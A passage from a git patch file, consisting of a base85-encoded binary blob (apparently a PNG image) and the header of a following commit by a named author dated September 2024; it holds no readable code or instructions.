z`HfIHc2JIr-DxboQb|IV8X{P55taCrZI^TWb<ODeo1fe`+n3u+4b#*L$k+yvD1=zh
z1sP0|&u?c{o8Of_bjF0h&((kGjKBa&$$l9nvflR_A!j{C?9x&@FQR_P3@12+-~c|F
z6l=F0pIR<E=OaDZZm7BZ`RZkMn|}FPJ%JV=xeOolQrEo>{Yq2(^yQt#V(Ps>R3NRd
zbeYR2a&L#s4RqPagRTl+=6$!?8WMU8+%>FaUSe%^ac#NZ_Wi>HlG8W$ijbU(cZfCt
zr5&OjV4(3*%+ke)%iPMv!kWw1$raHqKr{@beO=8h9jra+Ev#+roFzf0J^dhhJ1a?$
zzMuw=hO4~wTRRnhcWYgLO|YfEgQchyNLmU@!dDCd;AHJ-PVejF=<FfpD+&4=R}As~
zuVHQw{of>>4w4`P4J~?k7k6uV0WJY99!^DHJ8wRa6c)XNyOoWYj)KxZArPM=L2o@h
zUB$S$eSCbleE7Ls+-<peMMXuqdHA^b_&5<1oF0D8p60%s&K?YZLHq+l!P>*p-Okn1
z&c&JjFHCa_7cWmq5D0Od{=ejNa@ElIZ+K^qe_8=y4{l#`S8iS|9&RTm?tkU*@Kp3h
zfc#US|0{<F7|~VX*0J_*@p8AcR`j-Z_GI{12rJ9~=6CgScl=u&D@$%`M{6epsRv?K
z-hZ1?Sye;pzd8OgfvugB>)%`mWB(har=89J80+6;`|HZz>inx92=@QR{Wt3W(*18@
z1eJz{n1YL?*I(kPDoBF<nqSPy#nR47?C-aHHliXz!q)tp0-}7DoB})|7MvnhLVTRU
z{CvV97Q%d1f`XR+0;THg;c4z{Y5f-z0-VbZfn#NDVa_AOYsG0PV8Mfc5E9_D5D*sO
z<g?_nv=9+B=jAuI{uhW>?sf>TG<W=0ss4hpLO_X#@QCvB^V@KmoAX+83JCIxAf&Oe
z;S{hCwX)_F5f-%;7Wo^>%2G_p#ofsqv7B~J=C;<{uFkf9U---5VzOGQk{~`Vp8pxq
zay0j}K`=;yUfMZ(`ToxZu$_~&uBZ85*5noD6BG~>;uR7U<QL@S7y2I}J!^LlgeU%m
z$;-pV{}0^1mPHJq48pMHfB7i_;BO9uE@JZT*5;lr?qC-eM@i6MBGLcF`L}!1OZ;O|
zRO~zu6n=ks{6BqO*V^qLpZ>809PR$TL{I;>+lrZ6{$mmkb8l;_zb8WQ{o|75TXSby
zYsCKkr$hbMxZVF{vCIW+g!rxaML8{m%n^%j$!Ec7ZX+bb$;)fQ!*4Fc$0NvV^Y7>$
zE;gP%=I++Awg^oT+8`Y0Z*AyV{x&7+zf=3Xwf@UaJbVJ2JffUD0$^T2F+M&q0YP>i
zJ~1915cfY7=KgC}|Ch!R-2We&Nc>IkFJS<|_m43|ctJ!f?*9%~|Fqd(X8eEn^Ut;T
ze>ejI`ahHWuk8CDbN$C$|0@gpuZaKSUH>uH|H=aYE8_on*Z*(k!up?t$J!Zj3i3gu
zGlE?8lZaFZ%|cyS0qN<l-{Rh?bi@dztBRoq;&Cdbzg_@U9mX@nAiAfjh9deNCJHVo
z=Qh`e93&)qBvl1ju<z1wfnN?ar0YrgwC3a>w=R;yBpsDN;7C1Z|Gnx0u%&tfl|&0n
zK!Bo1sPN#{8|pvEuCFD7npzv~7>-5&AY8Oktqgd9g7OI@{sn9c7!%?*f$Tm!XeWWN
zUfy_4c&7Ok*%nH?`%<I38+f=%W*+&dX)2bD+7j!FWr_L%$i+j-gPbY{y+5oCGX?8E
zzkpVAwL%9=g?nT4ou`r>IIJxLHsdsC%5>*W=$rVP1bMJ?Fkb@o0P3OJ@WX9sb!&n}
zVZhgnk3!J<R#qO=GZlE}GXoq6Acu~D<L3Ex#r+hanG^lYkK0r2*~Qo+z!>TpItMZ-
zwgmKyOuNwa{ZQZK=s}O8Q{m!TseOm6mAF}e8M>K1J<19C2?{M^x*>60-+D5VLlA*&
z*-q!@^R?<=g5NBdF@{JhOwgOFNW^LHYqTO*Lu0$r$nu)N(<MqWlmboz=fv_M6{b&a
zmqq$YCCRKve42DH9L5kfSn5v%628i~NWtA*dm-rM_`{&5HP$iW;H8<mS)gHLWthom
zDanTUMpgA1ZDdroQmCMDsQbe)!5<E25ui}+N*}bNFIh3(kGtE~qCt~BxWo`z7FrO>
z9I6~v6_%}K0%)N$m*62xrKon+C7nJ+ZGi_y{X*?xVDW080O<8{*ZX<58uUm*-vES^
zuf!n1I*C}^IO3E1$EUz?r7QZ39+HRsrKYDfK?zDoyXG)ywIsDjU0sn$&7R_*&gK_F
zv)MxIL{5(|7XY{UahL4ORZsLre(tp$Tv%ID2K>aGxb;hKA?nb+rG2^^HQ7Tc_wJkW
zmAb5fuRn@GM1R}&YFZOCu&~|)PN|#^Fm7u=@k%c0@P~+$LzhWsH`jz+;j{vE5aDmJ
zGZTg2XO}(=GyuH{wbPu{sT!T%m>U7rYqfL1734nsQ#_$+yL_Mv4G5m@<<_9<Tlh&=
zAG$Ga;^0yWy7qi41Dp~mNgbxzx-~{Ji*Oc$038A^$t5!-d7?9RGhK*e8#$>S?f`8c
zQXr8CX68DIc@+&{Zdohg(52G#c@q(o8Qpv{SqT`d-aQL(3&u;77v;nFbr|i$UDIAL
zlar^_%ck>i9be7vnBl>P`w{S7Y^Cn7s8~zpDy~n*?obH@;yrd!`Xe99F&S1wtEmOJ
zR4_>qgNifoiCd4sOe=$CFothq-1{mF0$|}~XK@w=za0i%S2pzb!&9_ZJ5s50^1gC(
zWN5x|fJ|c*8IY3BIkv&yi+JOwpPWkLbfV0jvKnjQV9P_9t@3QepAF}+B@&UNzf|<{
zP!IyX01$;%UNjoPl|=<He$5LN#*W9u8<#@UIRowe3=BHH18SL8h4coEBcYA1R=gbd
z6({%w-mzBt#LU=^(Famk=-6$@L5#UL4xzLgiW^L3qN5Jm{rZuw0IX`g$|(0trGPK$
zyEveEq}uv}FJC{&b$&-;U!G}3D8t{R0!d+yj?$qSJYq>B_)=0$`({T<aYGgyLS=Mk
zHtKe(1tBa`S1-5~65Bwj>jjEDXW1tE4i{LpqahI;52}8Y`>q~uKHr40qAP!|ND~Ts
zs)FvSQNMZJhV4WHpFwd<I<TvzMXr<aDukZkOGG>)+Y+YnmIzg>UnSbBnz<v#)olE{
zdMJ@DPMNxl+J)_FAF*w)xU;BKCy6@S2t6PiY&w&nxfi1a4VT_BnURd9)Fm|v4Bc~*
zm!Ir(J;JIVSuwDmhW+I@_gD7W_^=&P@JbteBeo1o#Smf?Rh;qu@b%_BX~-4a7W5(q
zcPL(o!<{XTfz9@{g!`DE<Rr|JFURkSFdQ2|_=0@zB<6jZg_2@{^w9b05i){BG~d7o
z<gDFWipe7OmylUw-V;-Zyi70IEL}-AaIVmDbHrL(|IIhUZWX=foO)EC{GWmoq(6Km
zCXoZl7m65xp9XU}9eXW^LX%{FR@NQ9c@7e;IY=1P3BK~jt;_P{Dmznurvbj&u)qyu
zH~r=Kap{|OFFAzHVFCt?;YjGYJGi1{<D;3)lm#0|)`gC?rI60vI8cYAGfF=}HZ--l
zTI|VUd20!qs}J&K^4r3M^2oV`F<+h;KLu~#Wb8)p(ADe1FQ!EG6&pxqVOTLF19GPu
z^<S==Kc6qcc@6IR^{&pW-F#eDUBI*QSF@YQGZ~f1%|lE4+7ES5Dbzs1)DN-yr~7Zt
zoVzW#U4>mcviEtaX(A4qWA6ba^XhlQ$k>N~CNPamrqWL~Z4=wlz28i?u1{ujc@p-?
z>G7oxGY1n|L0Uh24{3W`w+Ysqh(PkRR?ey&l!7%u&DYu0Ye2_F=+^{oeMq#*yHHn>
zGkNZUJ6>0MkT6n;e?v&1)+iYjsX^hPI6SHp`XXLR+(64O_Zm~-`!-f<-N7dLbQcGQ
z<C$PUy7K9cJ+VpTL7)9`jAH%?{ZZXw0D9ckCFz9S1JO`^*a%VKVG-26ku@6DOz(hJ
zS5u>Bxfy6CjvaHkH_#jL`?cbroxB(AC|%uBL6)M4!ve-zdokhB=uHwhOI+z3oU4wi
z1Lw!dnxoBihX(nBlHv|#i@MP4HOyj0@a=bl)+02B{OQmx14(zDKdK06vUJ?~kXNdq
z!^QqThLE9-9x)DzT#8<}ZugsoV&Mn4Yz=vhlIEM3K$=)b)}i|~hXe9e0{DgT6Tt>Q
z)ZdkWBwTjS)>5}($_rld+0BTTV}(Qk^{bNHvt@38(U4o94uKE8orJp`>ywzaC-Gzg
zY(60OddHk3inF1=?9*U1tq~43x84(MyikdHz4R;==3RtX=qIf=M;VCCRXXyKoB@gk
z(efg!=`o%Eaob9)sUT|BWwIbl4aYnB<i-DEjzNC7%QPKl%@X>kg62io&|eeQLlSJv
zu^l3W!4#wpK9#%D$v8#VE;)IQF>yuXkeG0wr*tI`FNAwDYRIhZO_+t+Y>>&ahPd}$
z^Klla4}*j=29%^JoyYfcO@`yQ?$@yTIkT|Ha9M{bJNAt&=jyspX72`<pq6h<#e~sk
zsk9{Pxp5jp3KYGz@JuULVNDU*51^)$W^azTvU8vCdxh`JDq<s-VG89s&)qI5($GL&
z42L4EP2Sk0d!tGOU&0W#sKGA<93$TrJx@w34E8Ab%#uudZ$01w4#($%oy&S(1g}vW
z<gR|xbF923i|VWyAe^O!?iMfEZ$Q8y9A}&v+mfe0wedfCJaoHHI4vrfwq7%W8?i1o
zAp#gzkx|1&#!msU#v2t&csQjEUS8;kK(Wl8pL{SJ?{;&*HorjBi8f1g2!N`V`A}tI
z4Wu_;Gr}`~v%?Lz>XNm7<>rCr4#HnPEqV11Ek)O421ewI^zjMpkPGf;rKPosjjmTF
z+e}=Yo=<gcp+A50zAz4{$sVUM^^i$g?ET{L;1bZ#Kc;@yf3D-y(`IEO9x*wniP-r%
zLOKY_kcq3^0J{*!Aki!sbJo+nb*BHg0=QB6Dv_SU_>KI7s@4N##Z*o88oDQn`KBlm
zNU8dDhb-|bm3XrD0`6~llh913g9TCt=@eLu-j?k--*H~Czc@78u(L9{cnLWBHMFAo
zgd{SmN{L>Z%72iH16F>|4!%myL~?-R=`{MaGt323%@(0(>kqPa7amf9`|%|xjRM>_
zErLyTV-BtFv9)_CXSt1LZ&E^`*X6F+u^*W8#x<al2+zO=7=50j)!lxS!arhh`>=k|
z88A7^fVc^h&Y4CW$U~11r=Z4UnPRDo_S--f0l;(^iQpC@NVs6#lR<YmQhL~vmtmcc
z&KdP1g>3aB9Y?zcV3&a<k7oCKjOqh*Zsn+FpjUAtW3N5xQjh_gQ}L_Frn<u{uxt0I
z>G+5`+UxhW;*`Vd&(AYX$q>hY6yv*h-#y@Zf<V14r}6CO>%CB>%tOVwLi`nGx4>z7
z+00atK9mJD$PKHK$yenQe-&27{oL35$ycHqAL$Q9^`E!kp<aX915hCTyMWhI^_Bw3
zjgVQ>jbe)^(+xsOf4)=XL{|8w%wU*GV~wSRD;M+)=8p!bZk*&iUD=P7P<v^pGWx(u
zx|w`g&A#!R$Fl8*L+<zw(Fc*QyQq?Z-4Qx{7elsl!KiymS1FKqDWB5ADwXb@$ZA>|
z1(RL|t?DlJ5};?_?ydC2)Z=fTrz=_HTBc@{6r^AS)a+bL>W0x=*(kdP-RZ7xlJig4
zZYxF6+tr$~S46TiFmDtzSXE(@E5F5S0J?c<_IOZTL#fs#(#CdiM&k>STN-d9$oP+Y
zROpyNYJw^j4?u|ZMkYm>UP~J5mW((;=aCUCoiq{>&=69v+x94a!u0p;v@DcJ>p_uZ
z1q$?~14(mTI9BLc5vdYA2u~AJ+Ya#*Jt*;hW5>Y0sru1LGE3%~Kiuni0uRX#O|C7+
zIa&9pvr_vc@@a|_a&+psF^Ujm!EWE62hZ1`v946<{Of@Cf*KC>#jBVPfN6HOoA>k_
zfhHSo6@m}C9-m&0wpE4kGD?1idI-Oy>*<NRQy*qEra4nlEFqh?GE!B7K{AJo_=d!q
z63b&Cqz17tWiqFmcPz(ZUnauafl^JVdq1hvZ`Zc&ta91iyLN9oo()%_y4|2Po+8o&
zA3se8yx~6(wJWr=@BR~dxOLV20<;T85bg#G=_<fHT16maTpj%yi1%rUCcN5VkRZ%X
zd2%ZZKeX?ro^9}LnCb60s^Q%Yk=-qk6#wKWR3*Wu=e`epxUUt^+-_P(hou!DPh_dO
zGY3hK1UbS*eBX9*J)w?4kB8$?wHt1zA13#-RCnEF5ifD^)R)H+G1eP`y)rnNs@PL+
zJsERsPd0kReU&Qp5Lr{h&Ah2t#~&ql*Da=g5!Ss-;(d0uol6b5fv&C-D?}1!cGPwT
zLmBA?r6O?9D{8G;R8D8(%z}V)XEs}Y`+8EfOR;(!Xrq5ml8tz*YYB}*>8I?()x<U5
z@s`lr@xk=0srURW9SiyS_RHmb$xM8-ZxzuCCm}m}TiST?ux|STkwO&e1lSWqSte;#
z^^pl)L}4|nK|nf(R&l@h*&9D2x4Lhm>v4Y6*awI@PsCdRdxK2tk=VtNH{JzA%OY8%
z^2K6MXA3+rHj5i-|G_BUSTpdhd}f7G!Q|D9>d`SW2g-x7lh?Zj#3?9*c+MM13d)T*
zQAB57_u>*6rwp^s>T0bjM7sFe=>KYfU%a=)Zo-F#;Hdpk%ba4+elYp&t-l5k-Iu<i
zdoMs-gI*;@FdMM07(=-drfl*GVMXO8Z*H)UlJBU;1C_-5x{o`w-Y&vjIWj6(AsOvY
zPNfcdKYJ5nyb|CTi$t*S$~Z)<DN}B+>-F^T(F?e3*m{D_FTF%DULO%x{x8)lw;|uP
z=eJ}Helrf`YLj;DiVf8vLb=ey)vJl_$B%~dMUo$n4(jIfYcoy>XNgeyPAfd}dKsF)
zKP6c#Rh7o{id$RRp<$SB8W-XyqQ3irQxvYc>7h>R>;*aED4S|&X@5#2fA{^V4cB@6
zQJmrOs>UB#A1MzrpTjka-DcF^g)=(pj<D-l>QipMy?TE-or7?sbQw59xWctFehk~U
z@*<FZ79W^E^iUOD{C=trsJa+Z2~ZfO+?d}k!cDlndm@_;g7fak!;_vqHNWON#@nd1
zw`~qT$gNQwpPfS{>3}-BJqW0d{t}eMwcXoe43U_7jJ6^j$C!oWzL{Zm6>`1K05AUz
zA&G)=H6_JL7=QURx8xKWOf^Wd+rsXMcO*x=YRIpZ^d~g5Q2Ci2Wyy1Tk}g~W5Qy%M
z%&cZa#7v2JIDy@`gJxFotE11hVF3so*s)n|Kflv$_s4icmtkHq(zv!?S6fnf<2P$f
zJMR+;N3%EChTX6mn-|#;q=v+>opHMQB;tTBoaYS@Z*{td2HcPFp-$;7%a<Hy1wD$?
zfwj@*b~I9RFL?Hm^^!2a=B&|<3%IFg8Cno~90Usx7sXky{+SgM<zT1~96R!T(US{k
zR$1kN>{tVxAZ6$M18HSUw`V)WZxEyMeMzI69;_wSJS%(UNohrVKBThG^FbM0g?WTx
z_M=?Sk)4fBT8Ly1k(t@^5!wKwEDWkO=*TU15?PK0)JqPpYeqP+V*G1_c<mGA`Mlb6
zCT`lR^(6Ycm})*OQp_$1QtINNDy0~o^287Hp|U|cFg%eO2py*3#I@aRa*}q;@9Zm+
z#NaQn1#`jB#q00z7^Md9-(Q-&pM#7HtV&Ze_$dsW6Kkp;U<N%*pb7mt3-KYK9EI6@
znoos+4@<%}A*D@x(mtw~Vvds|v2ED4jx6^tJ4<f|z0~i;B<v?b?M49ZSd}ET?lvz4
z93iwT#sTFbq;`Jf^e~d!6j7g3ykwmP6odL=`z;NSrx<~mgC2Y5uaQh4ytoky*>*wu
zF-EhfJ-EXzu@V3SY+7F`Mq}`LK>LMwlCdo?71l`aXsrOF*z3^I*0v#{XCX=2IeRaL
zLXQ5yl<2vLs4&`s=T9N3Sj!3>_0TU$MDH#|HBp0{6<7FfYCP98kU3@{g12JtDWU^w
z3H@WR@dhAp5nv+f+~wuB#?Oa^00kXqYk0h6Xmjk$i!(<76Yn>PT3ZIu4>Cg;T`Coe
zc{+MC&~LXhsq70)c0noiNl0yS_HGY5VWb6m^2soY;*iczCYT@gjUd#`Pk>%S1NH@R
z=1!NWf;pG2dOT<lI}a|MBG#_vYj&Y#3Q&(C%?97{_4^&1ds)y!=u%UEOTPOsz#z(A
zgDr;1U=sb_NggRnY+QtBxMM@)#@{aF>ub~da^9Y}Y`Y><4&vGHPnfbZ5He?%GM2cX
z@5=jfuog8k_Riiz&(>L+-ZNUl^x9-!mhSDJ-sjQZA@$4Uq~uV2XzTCVZO2!G`XaIh
zFzY=R)TjEuj#BZdk(^ZR${(NCMty@sw|#O5@m;NZ>}H{6v?MS%aWP#1u8)-dVx;bM
zP-?=0Om)@FB3Z^ocFCARCtV3rH_PFzvZh_3BwOA%E{0Wlp4b>daUzNNCp_pxS$8Je
zGU>o4jW8+Wb&BP=ail`^l3QUj3BI#{xzAe-ARV_v%_PI<gX;!W3JZI}xqW2+#ZaBJ
z2%ab54LR=VU<x-0qr^YapU;_M>&~Vg<=Mt`Eya>xAwB}bHQ=GhO)iVE=LP{7JcQdF
zi0?Y-5KG>?reU7%`@+M6wahB<?%Aw08=tB+5LnCVIaTB3MqCE9WV6YflWGJhn^)sD
zMGkBEhjI!FU~}!A9-*FG=lG?R52rwKo`dd?nPXwnWz?^MuB9XKBMkP(r^Heg3WbN5
zzvP`3L}WC<+-fzv>{<mZBnI~CbKl<VcJ*a4`t<4~Ur|GiVpZa;mOgH{!akgJYmTnM
zo+BTgB5m0*S&^Li{@DeEX6>x%xEL%*_Toq5HqCOX#1|K7P&g#$S;gy}Ap4@t=E5UL
z0J2_D;jd@Ez|{r)OWpvBDgkUoF<|Dypr#U~K(-@H&)0jxY%QdFx;X}$ViOLi@&S+M
zo=IWMNh-MP_D8*N%f!hh?SwpjIJ$PPi=jcR#-GxFM3stCD_%%>-DPBy%Co3|`S-b<
z?A?|dd`c4M1H<)+TLAHhl`Ih)9ZeL8DyR{-bFLM{=N4~AqdO=i7B=T7mJMCZGwgMb
zbiidW?BPD67Ye3<a~zux04EYutSvNP252^eoPOYP?1e@0Dw|{-KUgjPrF7V1su8U{
z?;h2LLdM}*4oP9g!oW2A4(%XRJ&-dBX*P}C2po1Y3m>rG3bMbAc9?sl?ezZ%jWM=6
zMdFKp>}^@ic(NdDN{9uME)jP18_yc&{>k4n43YaOpBehc<Yv0VK>LC1i@+oyCGv&w
zn^0Y?-ga`*xksX=(2CHq=K8k813+X@W%63Bg=;KK7#Q%{!C|RPSI@g1MKYhUQ%dft
z%0vb0U8C=>r$Bk)Yv8NcR6`Q3TSlI_=w6cfE5l(!EDpY*z_vLTHumoBFe0VP`sXFO
z+P!?SkA4d^fIZf2c~$?EotAO<w4lG*AF@zWuuruC^|g-@Tmy80$z9-KkKgdgi=J5r
zc>0LZTR*iXI~8$#(eYT|myYa>&!e0OJ_vg%c(E14{$hBEDvb3u<xiv_n*Jl!vy}Uh
z&UMP^PD~G)s3)ba*te^r9jIB_K{%-tbN20}Uv+zp6ud_&JxFfu6Lo7~u`6t@a=m<%
z){2{Ab>paobYb$xZ)cVSV*qxOwZOvPWW$&1G#PU_uxhF2O5V&n(SW@7`!ib#%_Iw{
zk%zd()YqI^h;4@n3elUb5AB~rHE#6wI;eCyChsEn?fZ?R^yS@4un(~Pd5!mh@|7rw
zAF<`dU>_>gPaFqsbI`i>tYv}=|NZI*)m_%OgCZ2X>c{|;!<`s7306_v$sCi+&yLvq
z*AoNp^n0?t#(!egde|^qAvFDUl$dSzl(u_2QRa`{gx>^p9N|zLYe(LVgRx7__s@Gg
zlnE)QV$>0*cF<`5di9({aObAFkWo`iUf_()mavORWL$msb$HXH?(_K;Q|R%X#TXD#
zPCz6R`12%Y>^;uY8s1&l%vW{_n$I`efDpZod67QKS)|z%6z%y>9q1eRHb3_0Hx3ci
zB1~$Uj0+R0gzCWBry6u$?JZYLri9B&pGOkk<`v8?3#`(HZDeVspLtu0T_>p37q_Ls
zhKpDHhT035)_AH&cLhV6h<yFH%(Vyl$bx~5-bYl86uuVYAE6U$sx^97U5L8!qw7(Y
zim565aa>BfH=(>a#5z0Ec$~Ra^RU`ps1%e9On*Op@-80F&@hLa9gBH1UJl#B2PGL8
zj4=ij3&_;x;~`3=E4%HoFzEd71D~1WUT?!}<HC`x<M9=my3UmRES4A=qF#36*YK2o
zQ(3qQoRc)}=g%7tDz@)e5$niCnE9nDOv5Ed{^i}UUqhp**v-{Pu1t+>dolT8_1zb~
z4Nti~c{B$2Pno;7J~q=`-+?4iu`q7rl$sHA_FJ}q-5Z7r`7qs9O$UfMWuDq9{)%Iw
zD0go86cXt>vryaS>z0oVkVLGn_8)pN;h3}KvG{40Nx->cm(##UGBZRC<r!#Ro$sW6
z3Vkhdgi*n}@n9oh*Jy)!L(<fL<xA41-(l$Cop-a*=_+3yaQ~oJtERNh$A4d*XMSAX
zXf_BC2TgzQYyhSBPIeTNrD7BQai6oRXM2)h*`B9&rv|<GQt9D@>mCy%0HSEcRJHcA
zi!J&<0(}LsAnE%E(~CclP)M!~cX&`zurV7uviG66^pScFeM6Y)@WKTp{RjF-F(Gt4
za|(OqqdCUlp3zX$;xms8pkWoPR7+#B!;JGxlJE~~_x1*n-Kw?6)3@TzkI7$=C68n-
zdOELQ#6KR>97i2Q$QsAS9ONQA8>gwPPo47j@~(D;4mYx2qG)9)y0Dj(ijH0-QV);}
zGjLTM2FYlJST$E}N`yrr>j%`dr;d+2IT9wzd2vBIaBED-hWW!tkQ?<->xzAXBS-KR
zes<PPi<xiK4LJ`O)%qylfm7qX8nOrE>Y%ousf3Zt!f7$S#X~w<e-RKj{Z7>L;0q3L
z5wr0xe=llwZ9F<u+QA&aFo4O9{ZfzLQ}DIP-7!7KWvPE6+@9Lj^qMnWLRigt`_?ja
zIutvcN4oq=A{HImBXN^KEt+1gg9$x|Swj=%#P<$8JN=1kM<a+He3fM}1A%Qni;VIT
zG7jK4%OLk~nY$9cRwaIeRw&O-mn%VTZ+Gw((602e!AH<w-3#_Oi(34Z*9N|bF3bAl
z)a)&uHaRH^x|ltpukQi9GEh6zMBl+2o2c~YN=i4{-a%G2Kc<k)q0<qLeceNL=4r6M
zQqfUXQ`7#JmzQUc_g1ORJwPU|T=MemYgIQD5)SE3x`MxZJP@_i%z=Zrr=$_}JasAn
z7*X%IK{$9KqNd?F0+95^KR15j;yw=XrSF%fS9h|Txk`lN!VNizZt7R2*)M`*Xi}fX
zUPK6^D@s<}UkxqcZJ_XuXBHj?P)Su?bihD9Ww)*L9QQUO!jtRL=;ZjfGT%ZWbLm{j
zHv3S>on9TomCx%ke*uuPwsr7*Kj7|H#_ewLE%jMbwrewP!*Zgqx6iq8h|5MwwN&Cr
z93nY?Xxj6F>Z6&PTWf?NN^RQ~V}9|0KJFwnyz1$yb##QOza-|1APK^_zU9P`Q7#$c
z3qdrU%N`GgrlZ-o$Y4YpcAvWdXq<FV7189Hqb-S>y8cRa*P9L+)YkbZ1rG>4M7woi
zbAP?`xb}wX(r?&Jvjz*J;(nmi|HaudE9Ai8$$PcBmL6IUCxL$>Ke;vz379aH1_)Ur
zS`FED>vRrerAts~52Aipc!BQE4`rrGWp8QdcUt{eU`JPbCb<zHD{^*}h}FB9GGsqC
zA8Og!@CL%6RklY7=H>zQUr%+#!Nfufn~D)dVhUCLuDnp`AFe&Sw;mtB%l^+nlJo1I
zzqW;ZQuuCJ{fIQH8{Tw=sNxztlJ2|pR2Oo(Mr7MN)EriVCy?SZZg(K%diq}|r5!d6
z6xQAxoz`_uY|nu6v{PNGN6@t-c`&dW=Qq=IK<<&y!UC3pd~{>F+G~zRvk^oIhZ(5{
zQFPd~hjn;f)90Qosm*KCSSr4VRl%Fx3Z;gou-r?B{gM4WUUnlfFHM(2Y#6YD=p;f1
zDEjC+!F2`8L|(lHK4wmX$u{-Nfh0{F&;DG*KaR&!6>6yOQe&@!Q+pv-@`GZb*z|e!
z{6ETth^Ru06nC=L|EQ64shP*Yyl3Ojjw3o@$a)Efr{%76sy?<%ahjKDp2fkhAt6@v
zy;PR|*)dUof~qmVP#O{v#?oKU0x-8KrK?Gz1WICHcg&N6mx00wu;D8OlN-npM)hqm
z-?1U&A^nr#pw8nEbdIM->_Eg8<jx2}M|&vXo`+y++_4JoNLEWGfA$jxK-4XU){{n%
zHv~!c`RAgs2tmV0%cvFisu9x=F%(#?@VK!IBn~wx;L|}&IHHQe<5~&34z<>vhf;>w
zQ*8*PeM-fK8p@;jXm_nber8wGBDOy>)E_f<`<+@r)CeKg9hv%{Y;xp__hLA6mGuX{
z%0C~l=#Xtv+d4H<+p>hVpZY*7+f+<tSM{feLp<|nlx$9a1zPbE<!?!7Hlno~Fx$W&
zxG<s$KPO%5ughp;3-a-YYFMPE)Q<eArtRY5c<>`h!BLm~p7k;&0yb2tlqN(v3>3%7
zvYgE(+D(R}Ml@f?7LVpQszYb1-SCha2xh0jW3#d~tq0=dfz$k!T#B%1xb@=80Lb$^
z{ZcMSsspN2*oarz%GhpiTM=cl`oaDif}6-cP2{Avh<a;(9kyWGvK-B>w^@uk)LoD(
z>inRb3ze%~5B~rYTOSt<EC|q>?2uuKA4hr-3)}UFL_3D-m<Fi*2}p#shHViBBVrN}
zg8&kG8SW^WOn~BF?eW4xx~PM6gJtSr?_F!{k{(hcsA}F2ZIExh_Cqxz?oVmyoN-?D
zvIepyZ#>oMwn0;<lRl!-o>;tFAgxBo$`g9Mmp*jze6cdw4RL&l9Z7)Kuy|-Eo6`E!
z*UuK(&pmnA8Te{!Vkl_J|7?u_=o5I=s}G*XRTswb_A|$iU-2F96Jqo-%=@b<v^(0p
zw|q>Z%^$Z}8n!ig0@ge}27F%H4Q0??C8}V+_>~Y*tu<X^COB(}*p_v>w=vJ%*|jco
zob<usuIHJZ%g;ROv&UDJE&RByjh_rSZqT)Zt+e1qR~(k6ieC9c-z#<B+g8PH(cm5d
zs4*O0K=Gijfa}P#2iOCGjq`3GgKs21i!<K*?0PJTT`|@RY@}s0$ktTf#fvxR0_j`+
zRu{??Zzm@SClq<$pFqY_@Ll@sh9MDk0Hn7?)Sb;BF67s}QYc&72gr4Nofn+B*ZAx!
zKPx=U2}m30#{AWvP5drE1Xx^<ZEUJCB0m)ctz$wlSRpDwG6PhErSG*n4S9!2)Ul&`
zYg|^NlWs13b_f^AQaxH5LN0z{eeGY14ydnaJIOQX!G`i{1@Ru<?gs3yyfE#S%EdwE
z2J_<Ch`fbD(UOp$-N@MVd#A>Uuse+W19A^Np=qhNcob(jXxjSto87O>j~kH72>!5t
z`cQW`aXA&Nv978Z58`7xY}0sa1!g_cD&+ZuhF{kbb<<Mqjnso^^ZC`Zzn?)vlW0IZ
z%we&}&?o4c!U)8r{bl?F<}RQ*o~6fqUru3CM4tP-y4c<=h@puJitj7{N8ZE4ZbYUd
zHHhKGN1O=X?^Gjdn26GOf2_#b%e3odbov&Q)RVfy5c7*_(Y!XW=xZi~*r*cNEpLDx
zwcZ+R>2Dk}BynrDniXwC->VgbkL+)E>a8C9K-50LW&s+b4^Kb?E@%RAL!$AGCNs_*
z@lnfEPY+jRrN^B?>eI)iE?KZRvjy(@RUlX&v7z&mo*B4UtOl?d1Mi7Ngju!^mu5bx
z-)Vrxw9dj_0a{g~u|8zEGIVQk(qH^s@ArpPNT`2oo`Zoxz^SJw756l_s8CO5G|&z5
z9U@Nsq7rNxMdyPkH0ZfDUt1#j7M|6Gl9C1LiX&E$s>r8IgiNiY-Agu%n7+@o)EIH)
zroy|a9B!~n8`jW%=w+97WBqiHT@Xp$GEe&GXEQHQGm{<K2w0c<qs>4){(l021AhEe
zx4l`7NfXDeCVHrfNTless(ME;Ec~DmE-#yDf4``nkG1;-QP*-t=wC$D_MYoM?79A(
zUfQ4DsQYYj{p~#0e<thttqs7bHuqfrDKDKnuo2J7X@pIzu}hYZu~UA5<BUVNZj3W+
z+?e!?ht@=|M2&P<YvLu#$C|0j5c$a{GxgTBcIj)wq()3e<Tg~Vj~w%hb<vWBi=CQA
z*+`%dmx5CMB2;%qbqlP0(sTX88|}d2@Nd_ndWjLa!*l(aL(VnRZBxpix&v#!v!bul
z(tzYN+J@HHrK{H1rSrx()4G7~jd7-ZevC8il{N8_ry5~@Ygx${J7xhU<05j=7&EP~
z#x8kzD4v~d>ev?e1Mml|{m&roj%iS8=ma`1)n+hef8YmYOYQ4HDgVa?(z!mM@H5~F
zlyibGU$^eX<ubH$u=<}UR|IjvHuBxA7nzw}s?EWegMsgpWE)&SbJH(^zx{dGbqg<@
z+YFH(m)#WK2ug#mlzEF`vlqe-Q0+zaGeOk#^!jjT>s89HH+CN*{cHDBI2)J=T&t=V
z7sJA^hBC6uG?E^F03zoDp~6o@%vC}Ef~vgq+0nbDOc;Jz;q$;G;50&eW1wAjeYvak
zHkZ65otvp5CjiF)i&4D_<6Il`FIY8fz-Oi*J$`RQP6y@!e+KSD^^RcDl!xiL)xLwM
z+X<1msJ@>h^K${p4~gPG1ln!axBFS|ixj509j?WGK;c+mf8c&pueEUFvas;luz}2J
zoh-)eQ7-G>2iO)^MiMOUC-LZ~fQdlTQ&m|AdbujUD@KJS>+`*AP}MJ<)4C~+vmZ%w
zw*yEfsot${8;<kmV(<K6O@eF5ba-m*z6gf_djp#$>BHQp%DiG!cws}iiw(A{YDTIp
z9U0T13AZ=^$N^6QT|k#YXJqYPRz_WQ16wwo+Y*shNrK)vVAnF&x)r#?T76(yG<;lj
z1X#5IS~`~rk?lli13DC1fgMQZIX?ru0KAOqQWaS)P(<}Lpf?Hff`!mPTEU3OIDygD
zm`zcgEHJHX8BQnZezy%!1iA$Bs`@a<LqV8-bz?a1jlK}HCDY!b*3QJ3>8Q>CTFRE#
z6q0#>%_Nx(3PfeS$O5ZLS`fVotN@Clx<o~u7v*`Aau+Y@eIVRe&-MQUU&Tq0Nu@8^
P00000NkvXXu0mjf>};y^


From 4c9223f8d02f6b17b64426394e183c8698922122 Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev" <vladyslav.guriev@gmail.com>
Date: Thu, 5 Sep 2024 10:20:03 +0300
